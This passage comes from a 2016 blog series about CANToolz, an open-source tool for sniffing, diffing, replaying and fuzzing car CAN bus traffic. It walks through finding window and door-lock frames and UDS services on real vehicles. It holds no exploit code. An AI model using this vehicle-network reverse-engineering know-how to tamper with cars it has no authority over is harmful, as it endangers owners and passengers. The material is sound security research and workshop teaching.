Yey! Both results are correlated and right (<b>0x12f8... are the answers</b>) ! Both methods works.<br />
And I can say this is just a PoC. Right now another CANToolz developer -<b> Sergey Kononenko</b> is working on algorithms for correlation and "<b>smart event detection</b>" and we will present it on <b><a href="http://en.mosec.org/#speech_bg">MOSEC</a></b> conference on <b>Jule 1 in Shanghai</b>. It will be cool!</div>
<div>
<br /></div>
<div>
P.S. On last screenshot you see that after changes we have same values (0x80) again. this is bug in DUMP, since I cut it wrong 8( But anyway it did not affect hack-quest challenge. </div>
<div>
<br />
Oh yeah... and last part: how to get carmaker and model? This is simplest thing. Just press <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Analyses of captured traffic". </span>And here CANToolz have re-assembled chain of few CAN frames, and detect ASCII. This ASCII will be a VIN number which you can google and find who is a vendor and what model it was (of course this VIN is dumb-faked...).<br />
<br />
As you see<b> CANToolz</b> can be very helpful and here a lot of features and methods that can help to understand whats going on in CAN bus! Yes... here we have kind of difficult interface and not-well-documented details... but have u seen <b>Radare2</b>? Just silly 8))) Promise to work on the documentation and hope for your feedback and etc.<br />
<br />
<b>TO BE CONTINUED ...</b></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com2tag:blogger.com,1999:blog-4711612808026791519.post-6456512452549182942016-05-04T16:20:00.002-07:002016-05-15T14:25:08.974-07:00CANToolz: ISO-TP and DIFF updates<div dir="ltr" style="text-align: left;" trbidi="on">
Hello all,<br />
<br />
Want to summarize all updates and features in CANToolz that help us to understand CAN network of vehicles.<br />
<br />
First of all I have ported CANToolz to Python 3.x, and have added CANSocket support. So new module <b>hw_CANSocket </b>working with CAN device over CAN Socket. Simple and cool.<br />
<br />
Another thing that was improved: UDS service detection and ISO TP detection methods in<b> mod_stat</b>. Anton Sysoev have reported that this module does some mistakes in ISO-TP detection, because on his VW all ISO-TP messages have padding to 8 bytes! So I have improved <b>mod_stat</b> it is now can detect padding in ISO-TP messages. Also padding feature was added to <b>gen_ping </b>so it is possible to generate messages with chosen padding. And as example of how it works, you can see how Anton can sniff traffic between VAG and his car's OBDII to understand which UDS services are used (and how):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBEqxU9nGZoBAFgeWI4S11xbbgYr1KTPcgCxS6ImE7K5ZT-7_s7WKUKQBqaVbpALEetW6aRLqTHdBjkT-tQU19gww-t4oUZAwWdqdhA5IgpCYT45Yvf9h26UPqW9zH_3bGDh8K1XaUgUH1/s1600/vw1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBEqxU9nGZoBAFgeWI4S11xbbgYr1KTPcgCxS6ImE7K5ZT-7_s7WKUKQBqaVbpALEetW6aRLqTHdBjkT-tQU19gww-t4oUZAwWdqdhA5IgpCYT45Yvf9h26UPqW9zH_3bGDh8K1XaUgUH1/s640/vw1.png" width="640" /></a></div>
<br />
This is dump of the traffic between VAG and VW. Here we can see, that two devices are talking with each other, and padding here '0x55' in requests and '0xAA' in responses. Also you can see that ID of UDS response is equal request's ID + 0x6A (not 0x8 as we are using by default). We need to change this parameter in 'UDS shift value' and then we can try to analyze traffic:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_0PmBxth4yQaxcHlW-uQH5e4dEnZHgPjUfiUPmhxmbJ-ajEfVMApWRI_4HDsHaGtLN0Mds_eeXBlZIXJJK_3DjxAuyZkjqVpqLi-b4HDn_UirbiXeCEpT1St2y15Tb3l2gR5r1N9FGEIh/s1600/vw2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_0PmBxth4yQaxcHlW-uQH5e4dEnZHgPjUfiUPmhxmbJ-ajEfVMApWRI_4HDsHaGtLN0Mds_eeXBlZIXJJK_3DjxAuyZkjqVpqLi-b4HDn_UirbiXeCEpT1St2y15Tb3l2gR5r1N9FGEIh/s640/vw2.png" width="640" /></a></div>
<br />
Wow! It works. Thx Andrey for testing this on your car and for feedback and advises. So here we can see that CANToolz can re-assemble ISO-TP messages and find UDS services! Yes, you can see here ERROR in 'security access', but this is because VW uses unknown (not default?) sub-commands, which CANToolz do not understand by default. But anyway we were able to get CHALLANGE and RESPONSE in security access, and looks like there is another problem, but it is out of our topic and may be Andrey will discover what he has found later. So here I am happy just because in general my UDS detection works <strike>very</strike> <strike>good</strike>. We could do more and find how to enable and disable this feature in ECU and then we can do the same action from CANToolz, without VAG anymore. But this is another story...<br />
<br />
One more important update related to DIFF mode. Now it is more functional and useful! And again let's see this features on real example provided by <a href="https://twitter.com/Z0ha4" style="background: 0px 0px rgb(255, 255, 255); box-sizing: border-box; color: #3a6d99; cursor: pointer; font-family: Tahoma, sans-serif, Arial, Helvetica; font-size: 13px; line-height: 19.5px; outline: 0px; white-space: pre-wrap;">@Z0ha4</a>. He has a BMW car, and he also preparing it for Hardware Village Russia. And now he is going to use DIFF feature of CANToolz to find useful control messages in CAN. He will tell more about this on <a href="http://www.phdays.com/">PHDays</a>, but I want to tell you about CANtoolz DIFF mode which has been changed a little bit. Now it supports multiply buffers, so you can name them and dump traffic into them separately, later you can do DIFFs between those buffers and dump them or dump just diffs. For that use command "<span style="background-color: white; color: green; font-family: "courier new"; font-weight: bold;">Switch sniffing to a new buffer</span>", and you can give name for this buffer. In general you need a white-noise traffic as general set (with this set where we have no actions you will do all diffs to find actions in other sets). Just start car, and dump CAN traffic for one minute. Then stop <b>mod_stat </b>and use "<span style="background-color: white; color: green; font-family: "courier new"; font-weight: bold;">Switch sniffing to a new buffer</span>" to create a new buffer. You can name it if you want, for example like that: "Windows Down/Up action". Then activate <b>mod_stat</b> and do these actions in the car. Just after that you can stop <b>mod_stat</b> and think about next actions. Then repeat: create buffer, activate <b>mod_stat</b>, do an action, disable <b>mod_stat</b> (or stop sniffing, because we do not need noisy frames in those buffers). After that you will have some buffers with all actions:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYeYt20FWPZSt_ZTqTC9EK1qXh8YozkSsNumBrD8KE6GZ1t52vERNchJm1ZduU23sGB8hTV2lFXlFG46F7kMAEFMAH8iz3YFkMfsy54qVhAXaZh5WkYWwOJoGGZvOhv2-kIeU0TEGQKY8/s1600/dif_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYeYt20FWPZSt_ZTqTC9EK1qXh8YozkSsNumBrD8KE6GZ1t52vERNchJm1ZduU23sGB8hTV2lFXlFG46F7kMAEFMAH8iz3YFkMfsy54qVhAXaZh5WkYWwOJoGGZvOhv2-kIeU0TEGQKY8/s640/dif_1.png" width="640" /></a></div>
<br />
You can do DIFF between any two buffers by using its index (or by default last two buffers will be compared). Here we are trying to find windows action's CAN frames:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3aSp73BPe04H8zJsrPFnphZxAg154tIu_R2yqo5sS_vs1quR_TCBuOpiz5jbE9rUHUw8vR2NnioVRxOFaV-zxuavMVnc4r3r72Ot42r717FptXnAEc4L7Rjt2bAYp5XX3HRO_pgdzwVFL/s1600/dif_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3aSp73BPe04H8zJsrPFnphZxAg154tIu_R2yqo5sS_vs1quR_TCBuOpiz5jbE9rUHUw8vR2NnioVRxOFaV-zxuavMVnc4r3r72Ot42r717FptXnAEc4L7Rjt2bAYp5XX3HRO_pgdzwVFL/s640/dif_2.png" width="640" /></a></div>
<br />
We are using "<span style="background-color: white; color: green; font-family: "courier new"; font-weight: bold;">Print Diff between two buffers (new ID only)</span>" to find only frames with ID that not sniffed in "white-noise" buffer. And frames with ID 0xFA looks exactly like what we are looking for. Of course we can dump this diff and do a replay.. or do something else but let me show you another simple thing that can help us to validate our guess: searching by ID. Yes, simple search. Let's do a search for this ID (0xFA) in all buffers:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPT8_eNx6HZO8H62BtzKVSBM_AbEFcWhK2eiSy3e8OWqX-7g8fYGgReQ3_fmX-wlCrGrD2oIZIoMIRkSrgOCmldJDfOUc-Y07Ssk0yQJQlwX7q3rck_GhPlpDAzDgY-cdCQd5evQRRs3tf/s1600/dif_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPT8_eNx6HZO8H62BtzKVSBM_AbEFcWhK2eiSy3e8OWqX-7g8fYGgReQ3_fmX-wlCrGrD2oIZIoMIRkSrgOCmldJDfOUc-Y07Ssk0yQJQlwX7q3rck_GhPlpDAzDgY-cdCQd5evQRRs3tf/s640/dif_3.png" width="640" /></a></div>
<br />
And as result we can see, that this ID (0xFA) found only in dump related to car's window's action. Also low value of the ID tell us that it looks like what we want. Later we can find which frames related to up or down action and what bits means what, but this is later work and we will cover this later.<br />
<br />
And once again I want to thanks all Hardware Village community for feedback about CANToolz and good advises. All these examples done by them just for fun and because they are enthusiasts! So I can improve CANToolz because of community help and that is great. Anyway for last 3 month (this tool is very young, as you can see) we have >200 commits and new awesome features will be added soon! Yes, maybe Front-End/GUI part not so awesome and we have lack of documentation, but anyway I found this project very useful not only for fun and CarHacking, but for OEM/Vendor internal tests and automation (security) and we will talk about this later, for sure. </div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com4tag:blogger.com,1999:blog-4711612808026791519.post-11810503175089467372016-04-17T05:03:00.002-07:002016-04-19T08:58:05.978-07:00CANToolz: mod_stat - diff mode<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Small updates in <b>CANToolz</b> in version 1.5-0:<br />
<br />
Have added DIFF mode to <b>mod_stats </b>module. This can be useful if you want to find what frames are new in the traffic. For example you have traffic dump, then you enable diff mode and do some action, like door unlock. Just after that you can press "print diff" and see all CAN frames that were found in the CAN BUS after enabling DIFF mode but not before. Of course there will be a lot of unneeded traffic as well, but anyway it should help to reduce amount of traffic for manual analysis. If you press "print DIFF (ID only)" then you will see only those CAN frames that have not known (in original dump, before diff mode enabled) arbitration ID.<br />
<br />
When you disable DIFF mode, all CAN frames will me merged to original mod_stat buffer, so you can repeat this action again and again... Finally you can DUMP diff frames and replay. This hould work faster then "binary search".<br />
<br />
<b>UPD: </b><br />
------------------------<br />
Let me show this on a real example (it will be part of Hardware Village Car Hacking Workshop). So my friends from Moscow have sent me few dumps of the traffic. Each dump contains one action performed in Honda Civic (9th generation). One of the actions was 'locking doors'. In that BUS we do not have 'control' frames, but we have 'status' frames, let's try to find them! Now I can remotely work with those dumps to understand difference in sets and find 'doors status' messages. First of all I will load and replay all other dumps as 'white noise'. In this traffic we should have status "door unlocked":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhikB96woi5_av9pTlsfxxwKlr8VQgqsvN5PO_AI3beGRcN-1KXniKZ2coWYKOHrG-ts-Rs_J-fJE-e19_B3WaEIHY_pO-09Dqzq7nyYDq-yMeic0-utB8fML-1L5poOi5OfBX7OZylHWO_/s1600/h1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhikB96woi5_av9pTlsfxxwKlr8VQgqsvN5PO_AI3beGRcN-1KXniKZ2coWYKOHrG-ts-Rs_J-fJE-e19_B3WaEIHY_pO-09Dqzq7nyYDq-yMeic0-utB8fML-1L5poOi5OfBX7OZylHWO_/s640/h1.png" width="640" /></a></div>
<div style="text-align: right;">
Loading and replay traffic with "white noise".</div>
<br />
Then I will switch to <b>mod_stat </b>and enable DIFF mode. After that I can go back to <b>gen_replay</b>, clean its memory and load/replay dump with status "doors are locked". That's it, now we print DIFF in <b>mod_stat:</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQyhuoAKjQu4pgi5CWacRLhq_khr_AFtXLJKge8rk9VAEyl8Fm2HS7JGbI3AAex0qkFKnit8MgX0dWsSzdjP5xK38cY0_KJLXMjWKcJMI3dTmEUfUwUHJzo_6RS_49jtuXVflzxhYKNz3t/s1600/h2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQyhuoAKjQu4pgi5CWacRLhq_khr_AFtXLJKge8rk9VAEyl8Fm2HS7JGbI3AAex0qkFKnit8MgX0dWsSzdjP5xK38cY0_KJLXMjWKcJMI3dTmEUfUwUHJzo_6RS_49jtuXVflzxhYKNz3t/s640/h2.png" width="640" /></a></div>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: right;">
Print difference sets of CAN frames</div>
<br />
Here we can see bunch of CAN frames. (Also let's dump them into file for more detailed analysis later). So we can see new values (0) for known Arbitration IDs (318259472/318255632) . This looks like door lock statuses (0x0 means locked, because before it was different value - 0x80. For that you cant use button "Print current table" and see what was there before). So this value have been changed only in this dump, so on 99% we can say this is doors lock statuses. Easy and I am happy to see that this DIFF idea works fine on practice and CANToolz can help my friends in Moscow! Stay tuned -)<br />
<br />
-----------------------------------------------------------------------------<br />
Also some changes for USBTin module: now we can change speed to any value (in kbaud). Not only preset values now!<br />
<br />
Another important thing: 'delay' parameter has been added to <b>gen_replay, gen_fuzz, gen_ping. </b>This is important if you do not want DoS for CAN BUS during 'write' operation.<br />
<br />
Also very nasty bug was fixed for USBtin... now everything is fine 8))<br />
<br />
P.S. Still it is very young software (1 month!), so there can be bugs, we are working on fixing bugs and improvements. Hope for community's help 8)<br />
<br />
P.P.S. New design of WEB GUI! Thx to my wife <a href="http://cargocollective.com/svetodesign">Svetlana Sintsova</a>!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com2tag:blogger.com,1999:blog-4711612808026791519.post-75022436785709972312016-03-31T05:45:00.000-07:002016-04-07T12:06:43.968-07:00CANToolz: mod_stat features<div dir="ltr" style="text-align: left;" trbidi="on">
Playing with some dumps of CAN traffic I am trying to implement <strike>not</strike>smart traffic-detection features in <b>CANToolz</b>. Main problem - when you see a lot of CAN frames you can't easily find some interesting data and commands. For that purpose I am trying to improve <b>mod_stat </b>module.<br />
<br />
<div style="text-align: justify;">
My friend from Moscow (@<a href="https://twitter.com/_Saplt">Saplt</a>) is preparing before next <b>HardwareVillage event </b>where we have small section dedicated to automotive security ( btw it will happen on May 17-16 in Moscow during <b><a href="http://www.phdays.com/press/news/46140/">PHDays conference</a></b>). So he have sent me some raw CAN traffic from his vehicle, (<b>mod_stat</b> can save all frames in some ASCII format and now I can replay this traffic by <b>mod_replay </b>here in Berlin). </div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
Improvements in 1.2-1</h4>
<div style="text-align: justify;">
First of all I want to improve ASCII detection. Of course ASCII is not common data format, but for VIN text detection and some other things that are in ASCII this feature could work. I have added ASCII detection before generating output, so now this output should looks better...</div>
<div style="text-align: justify;">
Also I have found that some frames have "fragmented" structure (because CAN frames are limited to 8 bytes, and that's why vendors trying to use one of these bytes as control/index byte, so you can transfer more data in one "message" by using few CAN frames). Popular format is<a href="https://en.wikipedia.org/wiki/ISO_15765-2"> <b>ISO-TP</b></a> so <b>mod_stat </b>can "re-assemble" CAN Frames into ISO-TP messages (if they have been found). ISO-TP used also for <b>UDS</b>, and I have added detection of UDS services. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But ISO-TP is not the only one format. I have found some other formats with "index" byte in CAN data field. Maybe it is also standardized format, but I do not know, so I tried to build common detection of "index" and data de-fragmentation by using found "index". This feature works only for CAN Frames that repeating these frames in the loop.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: justify;">
<span style="text-align: left;">Detected chain:</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYTf9jvPzPR5jln7yJhaxayqR7_x5yd_JfZ9NXBLjMR-yEY7ETOTAg8MFq4zVbcSfiT3_E9A1eCJAvUsa8CvLnROeBz7FXjiOychnTBBMHLDJIrFlFu0Qb_DOrWLu-1XnfkS9V6OM13RnD/s1600/b12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYTf9jvPzPR5jln7yJhaxayqR7_x5yd_JfZ9NXBLjMR-yEY7ETOTAg8MFq4zVbcSfiT3_E9A1eCJAvUsa8CvLnROeBz7FXjiOychnTBBMHLDJIrFlFu0Qb_DOrWLu-1XnfkS9V6OM13RnD/s1600/b12.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
Here we can see <b>non</b> ISO-TP message, which was re-built. I think we can play more with some "smart" analysis of CAN traffic, it is just very first tries... Also, if format is not so easy and "loop-detection" mechanism of <b>mod_stat</b> can't find logic then we can manually setup "index" pointer, "index" size and value. After that <b>mod_stat</b> will try to re-built chain. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="text-align: justify;">
As an additional feature I have added COMMENTs, so we can do comments for frames by arbitration ID:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Ee8SCu16TeZkyx4uBs-eXQNwGj9nUgUCyI8Wzz1yOPCLhmDq_DIB08QYqJGl9adGDVXBngZ5zDaYafiZDLUOUPu-KgULs774PXf9i2eiO-LMlLcUwlwiN-JTaOGmVboG7jNat2qIcaj8/s1600/b13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Ee8SCu16TeZkyx4uBs-eXQNwGj9nUgUCyI8Wzz1yOPCLhmDq_DIB08QYqJGl9adGDVXBngZ5zDaYafiZDLUOUPu-KgULs774PXf9i2eiO-LMlLcUwlwiN-JTaOGmVboG7jNat2qIcaj8/s1600/b13.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
This should help with marking frames while reverse engineering. Both: comments and manual "index" pointers can be exported/imported via META file. So if you want to share traffic with your colleague, you also can share this meta-data. For me it is important feature, because @<a href="https://twitter.com/_Saplt">Saplt</a> in Moscow and I am in Berlin, but we can share data and work together! Also I believe that both: meta-section and traffic detection algorithms can be improved a lot, current version is just a prototype, but I like it and want to share...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHGoMAkS-ZA9kc06lN4kMpbzefH1UNLRKI0JIejf4it0XqOXn8oufLjJ2j5QNgZ7IsyRPjRNESjJDiaEjFpreR78TgAjWPsJWWHQAUMUV4P7ud5VhL-hpDIP1UtumNeh-fsWF8WWT_aVh9/s1600/b14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHGoMAkS-ZA9kc06lN4kMpbzefH1UNLRKI0JIejf4it0XqOXn8oufLjJ2j5QNgZ7IsyRPjRNESjJDiaEjFpreR78TgAjWPsJWWHQAUMUV4P7ud5VhL-hpDIP1UtumNeh-fsWF8WWT_aVh9/s1600/b14.png" /></a></div>
<br />
P.S.<br />
Other fixes:<br />
- mod_stat print format changed. Now it is really formatted...<br />
- bugs in UDS detection during scanning<br />
- now mod_stat have ALL traffic, not only statistics. This is good and bad... good because of real traffic capture available, bad because of MEMORY.. Will think how to improve this.<br />
- fixed bug where WEB interface does not work without the Internet (dammed d3...)<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com3tag:blogger.com,1999:blog-4711612808026791519.post-13795533406120575472016-03-25T13:04:00.000-07:002016-03-29T02:42:52.850-07:00Yet Another Car Hacking Tool<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Few days ago I had a small talk (on our local Defcon group meeting - DC#7812) regarding CAN (</span><a href="https://wikipedia.org/wiki/Controller_Area_Network" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: "calibri"; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Controller Area Network</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">and ECU analysis with help of </span><a href="https://github.com/eik00d/CANToolz" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">CANToolz</span></a><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> framework. Therefore, here I would like to repeat some of the ideas from that talk, give some explanations about "Why I have created Yet Another CAN Hacking Tool" and what are my goals. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here you can find original slides - </span></div>
<span id="docs-internal-guid-290a29cd-ba19-44c9-99c9-ffd72f19cfa8"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz</span></a></div>
</div>
<h3 style="text-align: left;">
Intro</h3>
<div style="text-align: justify;">
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; line-height: 1.2; white-space: pre-wrap;"> Automotive Security is an extremely hot-topic now, and that is why I am interested in this field and very lucky to be a part of this automotive industry. Actually, this topic is HUGE: many of the technologies, big attack surface and blah blah blah….</span><br />
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">However, security of vehicle's local network has been the main topic for last few years. Yes, I am talking about CAN bus and this is a good moment to remind an awesome research done by Charlie Miller and Chris Valasek: </span><a href="http://illmatics.com/car_hacking.pdf" style="text-decoration: none;"><span style="color: #888888; font-family: "georgia"; font-size: 15.3333px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://illmatics.com/car_hacking.pdf</span></a><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">. I am not going to talk about CAN security in general since this is well-known thing (but highly important!). </span></span></div>
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca">
</span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">When I have started my own “actions in this field”, I met one big issue - lack of tools that can help me to do what I want. Actually, in the Internet you can find many different tools for working with CAN bus. These tools are quite good and helpful, but if you want to use them "together", perform a MitM or make something more, then you have to "customize" them. It is good if you have one car... but what is if you have more targets to test?</span></span></div>
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Finally, I came into a conclusion that I need to have one common framework where I can work with CAN bus and ECU devices together with minimum "code-writings". If you are familiar with such kind of tools like BurpSuite or MetaSploit then you will understand my words. I wanted such kind of tool as it is going to make my work easier in case if I will share results with someone else or work in a team. Thus, my aim was to have </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">module-based framework</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> that can perform </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">MitM (</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">or work with more than one bus</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">, will be </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">hardware independent </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">and have one-</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">standard interface</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> and even </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">GUI</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">. One more important thing I wanted to have is an </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">open-source</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> project – when </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">all people together will have access to more vehicles </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">than bunch of researchers. I think, together we can create more useful modules that can be used by testers, vendors (in an ideal world) and enthusiasts all over the world. </span></div>
<div>
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</span></div>
<div style="text-align: left;">
<br />
<a name='more'></a><br /></div>
<h3 style="text-align: left;">
CANToolz</h3>
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">With help of our DC#7812 community (thanks to Sergey Kononenko and Boris Ryutin), I have created beta version of such framework. It is based on Python 2.7 (Python 3 not supported yet). To work with hardware you need to (pip) install </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">pyserial</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. Right now, I have added support for two CAN hardware modules that will allow to access CAN bus via USB: </span><a href="http://www.fischl.de/usbtin/" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">USBtin</span></a><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 